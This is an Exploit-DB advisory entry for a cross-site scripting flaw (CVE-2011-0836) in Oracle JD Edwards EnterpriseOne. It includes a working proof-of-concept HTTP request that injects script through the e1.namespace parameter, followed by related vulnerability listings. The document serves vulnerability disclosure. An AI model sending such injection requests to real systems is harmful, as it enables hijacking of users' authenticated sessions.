Lucene search
Juan Manuel GarciaEDB-ID:35639HistoryApr 19, 2011 - 12:00 a.m.
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService?e1.namespace' Cross-Site Scripting
2011-04-1900:00:00
Juan Manuel Garcia
www.exploit-db.com
33
source: https://www.securityfocus.com/bid/47479/info
Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
http://XXX.XXX.XXX.XXX/jde/E1Menu_Menu.mafService
Parameter: e1.namespace
* The POST request has been set to: %2Balert%2835890%29%2B
/jde/E1Menu_Menu.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_Menu&e1.namespace=%2Balert%2835890%29%2B HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000b7KChC3OjQct7TOz9U6NMhK:14p7umbnp; e1MenuState=100003759|
Content-Length: 12
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Content-Type: application/x-www-form-urlencoded
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED
nodeId=&a=lcRelated
cvelist
cvelist
CVE-2011-0836
2011-04-20 10:00:00
prion
prion
Design/Logic Flaw
2011-04-20 10:55:00
exploitdb
exploitdb
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService?e1.namespace' Cross-Site Scripting
2011-04-19 00:00:00
nvd
nvd
CVE-2011-0836
2011-04-20 10:55:01
cve
cve
CVE-2011-0836
2011-04-20 10:55:01
packetstorm
packetstorm
Oracle JD Edwards EnterpriseOne Cross Site Scripting
2011-04-21 00:00:00
securityvulns
securityvulns
oracle
oracle
cpuapr2011
2011-04-19 00:00:00